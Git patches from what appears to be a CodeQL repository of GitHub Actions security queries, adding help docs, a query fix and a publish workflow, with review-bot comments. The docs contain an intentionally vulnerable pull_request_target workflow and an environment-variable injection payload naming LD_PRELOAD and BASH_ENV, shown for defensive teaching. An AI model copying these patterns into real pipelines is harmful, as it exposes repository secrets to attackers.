diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md
new file mode 100644
index 00000000000..c391e1255ed
--- /dev/null
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md
@@ -0,0 +1,137 @@
+# Execution of Untrusted Checkedout Code
+
+## Description
+
+GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job.
+
+## Recommendations
+
+- Avoid using `pull_request_target` unless necessary.
+- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations.
+- Use labels like `safe to test` to vet PRs and manage the execution context appropriately.
+
+The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens).
+
+The artifacts downloaded from the first workflow should be considered untrusted and verified.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker:
+
+```yaml
+on: pull_request_target
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+
+ - uses: actions/setup-node@v1
+ - run: |
+ npm install
+ npm build
+
+ - uses: completely/fakeaction@v2
+ with:
+ arg1: ${{ secrets.supersecret }}
+
+ - uses: fakerepo/comment-on-pr@v1
+ with:
+ message: |
+ Thank you!
+```
+
+### Correct Usage
+
+An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context.
+
+**ReceivePR.yml** (untrusted PR handling with artifact creation):
+
+```yaml
+name: Receive PR
+on:
+ pull_request:
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - name: Build
+ run: /bin/bash ./build.sh
+ - name: Save PR number
+ run: |
+ mkdir -p ./pr
+ echo ${{ github.event.number }} > ./pr/NR
+ - uses: actions/upload-artifact@v2
+ with:
+ name: pr
+ path: pr/
+```
+
+**CommentPR.yml** (processing artifacts with privileged access):
+
+```yaml
+name: Comment on the pull request
+on:
+ workflow_run:
+ workflows: ["Receive PR"]
+ types:
+ - completed
+jobs:
+ upload:
+ runs-on: ubuntu-latest
+ if: >
+ github.event.workflow_run.event == 'pull_request' &&
+ github.event.workflow_run.conclusion == 'success'
+ steps:
+ - name: "Download artifact"
+ uses: actions/github-script@v3.1.0
+ with:
+ script: |
+ var artifacts = await github.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: ${{github.event.workflow_run.id }},
+ });
+ var matchArtifact = artifacts.data.artifacts.filter((artifact) => {
+ return artifact.name == "pr";
+ })[0];
+ var download = await 
github.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: matchArtifact.id,
+ archive_format: 'zip',
+ });
+ var fs = require('fs');
+ fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data));
+ - run: |
+ mkdir -p tmp
+ unzip -d tmp/ pr.zip
+ - name: "Comment on PR"
+ uses: actions/github-script@v3
+ with:
+ github-token: ${{ secrets.GITHUB_TOKEN }}
+ script: |
+ var fs = require('fs');
+ var issue_number = Number(fs.readFileSync('./tmp/NR'));
+ // Verify that the file contains a numeric value
+ const contains_numeric = /\d/.test(issue_number);
+ if (contains_numeric) {
+ await github.issues.createComment({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: issue_number,
+ body: 'Everything is OK. Thank you for the PR!'
+ });
+ }
+```
+
+## References
+
+- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md
new file mode 100644
index 00000000000..c391e1255ed
--- /dev/null
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md
@@ -0,0 +1,137 @@ +# Execution of Untrusted Checkedout Code + +## Description + +GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Avoid using `pull_request_target` unless necessary. +- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. +- Use labels like `safe to test` to vet PRs and manage the execution context appropriately. + +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). + +The artifacts downloaded from the first workflow should be considered untrusted and verified. 
+ +## Examples + +### Incorrect Usage + +The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker: + +```yaml +on: pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! +``` + +### Correct Usage + +An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context. + +**ReceivePR.yml** (untrusted PR handling with artifact creation): + +```yaml +name: Receive PR +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Build + run: /bin/bash ./build.sh + - name: Save PR number + run: | + mkdir -p ./pr + echo ${{ github.event.number }} > ./pr/NR + - uses: actions/upload-artifact@v2 + with: + name: pr + path: pr/ +``` + +**CommentPR.yml** (processing artifacts with privileged access): + +```yaml +name: Comment on the pull request +on: + workflow_run: + workflows: ["Receive PR"] + types: + - completed +jobs: + upload: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + steps: + - name: "Download artifact" + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr"; + })[0]; + var download = await 
github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data)); + - run: | + mkdir -p tmp + unzip -d tmp/ pr.zip + - name: "Comment on PR" + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + var fs = require('fs'); + var issue_number = Number(fs.readFileSync('./tmp/NR')); + // Verify that the file contains a numeric value + const contains_numeric = /\d/.test(issue_number); + if (contains_numeric) { + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: issue_number, + body: 'Everything is OK. Thank you for the PR!' + }); + } +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) From 569e80b6784cece7a90f1ac70585d2e6dbfee133 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:17:18 +0200 Subject: [PATCH 0470/1267] Fix ImproperAccess query --- ql/src/Security/CWE-285/ImproperAccessControl.ql | 13 +++++++++---- .../Security/CWE-285/ImproperAccessControl.expected | 2 +- 2 files changed, 10 insertions(+), 5 deletions(-) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 2c7882604b2..ba002f16a87 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql 
@@ -17,9 +17,14 @@ import codeql.actions.security.ControlChecks from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout, Event event where job.isPrivileged() and - job.getATriggerEvent() = event and - event.getName() = "pull_request_target" and - event.getAnActivityType() = "synchronize" and - check.dominates(checkout) + job.getAStep() = checkout and + check.dominates(checkout) and + ( + job.getATriggerEvent() = event and + event.getName() = "pull_request_target" and + event.getAnActivityType() = "synchronize" + or + not exists(job.getATriggerEvent()) + ) select checkout, "The checked-out code can be modified after the authorization check $@.", check, check.toString() diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected index 53dd12b9fb6..92f87dc1f35 100644 --- a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected +++ b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected @@ -1 +1 @@ -| .github/workflows/test1.yml:15:7:20:4 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/test1.yml:17:11:17:75 | contain ... test') | contain ... test') | +| .github/workflows/test1.yml:15:7:20:4 | Uses Step | The checked-out code can be modified after the authorization check $@. | .github/workflows/test1.yml:17:11:17:75 | contain ... test') | contain ... test') | From d166b7c03a085c4a2ee79a7f0015aacdc9b31b9e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:34:42 +0200 Subject: [PATCH 0471/1267] Create publish.yml --- .github/workflows/publish.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 .github/workflows/publish.yml diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml new file mode 100644 index 00000000000..390d6845345 --- /dev/null +++ b/.github/workflows/publish.yml 
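Review bot: `event` is still declared in the `from` clause but is now constrained only in the first branch of the new disjunction, so in the `not exists(job.getATriggerEvent())` branch it ranges over every `Event` in the database. Because `event` is not selected this is mostly a needless cross product, but that branch would also return nothing for a database that contains no `Event` at all (inferred from QL semantics, not verified here). I would drop `Event event` from `from` and scope it to the branch that uses it: `exists(Event event | job.getATriggerEvent() = event and event.getName() = "pull_request_target" and event.getAnActivityType() = "synchronize")`. If the second branch is meant to cover jobs whose trigger cannot be resolved, a one-line comment saying so would help, e.g. `// no trigger event known for this job: report it rather than assume a safe trigger`. The query metadata and the start of the file lie outside the hunk.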
@@ -0,0 +1,26 @@ +name: Publish +on: + workflow_dispatch: + +jobs: + tests: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Fetch CodeQL + shell: bash + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh extension install github/gh-codeql + gh codeql set-channel "nightly" + gh codeql version + printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" + - name: Publish + env: + GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} + run: | + codeql pack publish ql/lib + codeql pack publish ql/src From 2b8169b000780fd82fd69bccc460e10db0160cd1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:37:52 +0200 Subject: [PATCH 0472/1267] Update publish.yml --- .github/workflows/publish.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index 390d6845345..b09112f2fdd 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -18,6 +18,14 @@ jobs: printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" + - name: Install Packs + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh repo clone github/codeql + codeql pack install "ql/lib" + codeql pack install "ql/src" + codeql pack install "ql/test" - name: Publish env: GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} From 23754b6d2f7868fdde57588f38cb8ad58547ce3f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:38:57 +0200 Subject: [PATCH 0473/1267] Update publish.yml --- .github/workflows/publish.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
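Review bot: The new workflow has no `permissions:` key, so the `GITHUB_TOKEN` passed to the `Fetch CodeQL` step gets whatever default the repository or organization grants, which may be read-write. That token is only used to check out the repository and install a `gh` extension, while publishing goes through the separate `GHCR_TOKEN` secret. A top-level `permissions:` block with `contents: read` should therefore be sufficient, to be confirmed on the first run. `actions/checkout@v3` is also referenced by a mutable tag in a job that later holds the publishing credential; `uses: actions/checkout@<FULL_COMMIT_SHA> # v3` would keep a moved tag from running in that job.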
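Review bot: The added `Install Packs` step clones `github/codeql` at whatever its default branch currently points to, and the step before it selects the `nightly` CLI channel, so the packs later published with `GHCR_TOKEN` are presumably resolved and built against inputs that change from run to run. Pinning the clone to a reviewed ref, for example `gh repo clone github/codeql -- --depth 1 --branch <PINNED_REF>`, and using a released CLI build would make a publish reproducible and narrow what an upstream change can carry into the registry. `codeql pack install "ql/test"` does not look necessary for publishing `ql/lib` and `ql/src` and could be dropped unless something else relies on it. The `steps:` list begins outside this hunk.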
diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index b09112f2fdd..bfe87d1056c 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -3,7 +3,7 @@ on: workflow_dispatch: jobs: - tests: + publish: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 From cc6badaea6fd22a4074da7e2f0717ff75ad28f0b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Sat, 10 Aug 2024 09:54:23 +0000 Subject: [PATCH 0474/1267] grammar --- ql/src/Security/CWE-077/EnvPathInjectionCritical.md | 2 +- ql/src/Security/CWE-077/EnvPathInjectionMedium.md | 2 +- ql/src/Security/CWE-077/EnvVarInjectionCritical.md | 2 +- ql/src/Security/CWE-077/EnvVarInjectionMedium.md | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index 1891d41fa39..88cc06de90a 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index 1891d41fa39..88cc06de90a 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md 
@@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md index 1d33a014d4b..a16b41e3970 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: This file should lines in the `KEY=VALUE` format: diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md index 1d33a014d4b..a16b41e3970 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: This file should lines in the `KEY=VALUE` format: From 77ecca9f5e8951d26f9d7bfde8f3b8f1b11b0bc2 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Sat, 10 Aug 2024 10:17:40 +0000 Subject: [PATCH 0475/1267] grammar --- ql/src/Security/CWE-077/EnvPathInjectionCritical.md | 8 +++++--- ql/src/Security/CWE-077/EnvPathInjectionMedium.md | 8 +++++--- 2 files changed, 10 insertions(+), 6 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index 88cc06de90a..ae9afbb76f4 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -2,17 +2,19 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. + +E.g.: ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH ``` -If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job. +If an attacker can control the contents of the system PATH, they are able to influence what commands are run in subsequent steps of the same job. ## Recommendations -- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. +Do not allow untrusted data to influence the system PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. ## Examples 
diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index 88cc06de90a..ae9afbb76f4 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md @@ -2,17 +2,19 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. + +E.g.: ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH ``` -If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job. +If an attacker can control the contents of the system PATH, they are able to influence what commands are run in subsequent steps of the same job. ## Recommendations -- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. +Do not allow untrusted data to influence the system PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. ## Examples From a282818272a8312dbe8a97725c5c04dd5f4f46d0 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Sat, 10 Aug 2024 10:52:06 +0000 Subject: [PATCH 0476/1267] grammar --- .../CWE-077/EnvPathInjectionCritical.md | 2 +- .../CWE-077/EnvPathInjectionMedium.md | 2 +- .../CWE-077/EnvVarInjectionCritical.md | 58 +++++++++---------- .../Security/CWE-077/EnvVarInjectionMedium.md | 58 +++++++++---------- 4 files changed, 60 insertions(+), 60 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index ae9afbb76f4..436cf685996 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g.: diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index ae9afbb76f4..436cf685996 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md 
@@ -2,7 +2,7 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g.: diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md index a16b41e3970..cc35402b804 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md @@ -2,9 +2,9 @@ ## Description -GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define environment variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: -This file should lines in the `KEY=VALUE` format: +This file contains lines in the `KEY=VALUE` format: ```bash steps: @@ -14,7 +14,7 @@ steps: echo "action_state=yellow" >> "$GITHUB_ENV" ``` -It is also possible to define a multiline variables by using the following format: +It is also possible to define multiline variables by using the [following construct](https://en.wikipedia.org/wiki/Here_document): ``` KEY<<{delimiter} 
@@ -35,40 +35,40 @@ steps: } >> "$GITHUB_ENV" ``` -If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. +If an attacker can control the values assigned to environment variables and there is no sanitization in place, the attacker will be able to inject additional variables by injecting new lines or `{delimiters}`. ## Recommendations -1. **Do Not Allow Untrusted Data to Influence Environment Variables**: +1. **Do not allow untrusted data to influence environment variables**: -- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. -- Validate and sanitize all inputs before using them in environment settings. + - Avoid using untrusted data sources (e.g., artifact content) to define environment variables. + - Validate and sanitize all inputs before using them in environment settings. -2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: +2. **Do not allow new lines when defining single line environment variables**: -- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + - `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` -3. **Use Unique Identifiers When Defining Multi Line Environment Variables**: +3. 
**Use unique identifiers when defining multi line environment variables**: -```bash -steps: - - name: Set the value in bash - id: step_one - run: | - # Generate a UUID - UUID=$(uuidgen) - { - echo "JSON_RESPONSE<> "$GITHUB_ENV" -``` + ```bash + steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" + ``` ## Examples ### Example of Vulnerability -Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: +Consider the following basic setup where an environment variable `MYVAR` is set and used in subsequent steps: ```yaml steps: @@ -78,17 +78,17 @@ steps: BODY: ${{ github.event.comment.body }} run: | REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') - echo "BODY=$REPLACED" >> "$GITHUB_ENV" + echo "MYVAR=$REPLACED" >> "$GITHUB_ENV" ``` -If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, the attacker can potentially inject new environment variables. For example, they could write an issue comment like: -``` +```text FOO NEW_ENV_VAR=MALICIOUS_VALUE ``` -Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: +Likewise, if the attacker controls a file in the GitHub Actions Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact) and the contents of that file are assigned to an environment variable such as: ```bash - run: | 
@@ -109,7 +109,7 @@ An attacker could craft a malicious artifact that writes dangerous environment v ### Exploitation -An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. +An attacker is be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. ## References diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md index a16b41e3970..cc35402b804 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md @@ -2,9 +2,9 @@ ## Description -GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define environment variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: -This file should lines in the `KEY=VALUE` format: +This file contains lines in the `KEY=VALUE` format: ```bash steps: @@ -14,7 +14,7 @@ steps: echo "action_state=yellow" >> "$GITHUB_ENV" ``` -It is also possible to define a multiline variables by using the following format: +It is also possible to define multiline variables by using the [following construct](https://en.wikipedia.org/wiki/Here_document): ``` KEY<<{delimiter} 
@@ -35,40 +35,40 @@ steps: } >> "$GITHUB_ENV" ``` -If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. +If an attacker can control the values assigned to environment variables and there is no sanitization in place, the attacker will be able to inject additional variables by injecting new lines or `{delimiters}`. ## Recommendations -1. **Do Not Allow Untrusted Data to Influence Environment Variables**: +1. **Do not allow untrusted data to influence environment variables**: -- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. -- Validate and sanitize all inputs before using them in environment settings. + - Avoid using untrusted data sources (e.g., artifact content) to define environment variables. + - Validate and sanitize all inputs before using them in environment settings. -2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: +2. **Do not allow new lines when defining single line environment variables**: -- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + - `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` -3. **Use Unique Identifiers When Defining Multi Line Environment Variables**: +3. 
**Use unique identifiers when defining multi line environment variables**: -```bash -steps: - - name: Set the value in bash - id: step_one - run: | - # Generate a UUID - UUID=$(uuidgen) - { - echo "JSON_RESPONSE<> "$GITHUB_ENV" -``` + ```bash + steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" + ``` ## Examples ### Example of Vulnerability -Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: +Consider the following basic setup where an environment variable `MYVAR` is set and used in subsequent steps: ```yaml steps: @@ -78,17 +78,17 @@ steps: BODY: ${{ github.event.comment.body }} run: | REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') - echo "BODY=$REPLACED" >> "$GITHUB_ENV" + echo "MYVAR=$REPLACED" >> "$GITHUB_ENV" ``` -If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, the attacker can potentially inject new environment variables. For example, they could write an issue comment like: -``` +```text FOO NEW_ENV_VAR=MALICIOUS_VALUE ``` -Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: +Likewise, if the attacker controls a file in the GitHub Actions Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact) and the contents of that file are assigned to an environment variable such as: ```bash - run: | 
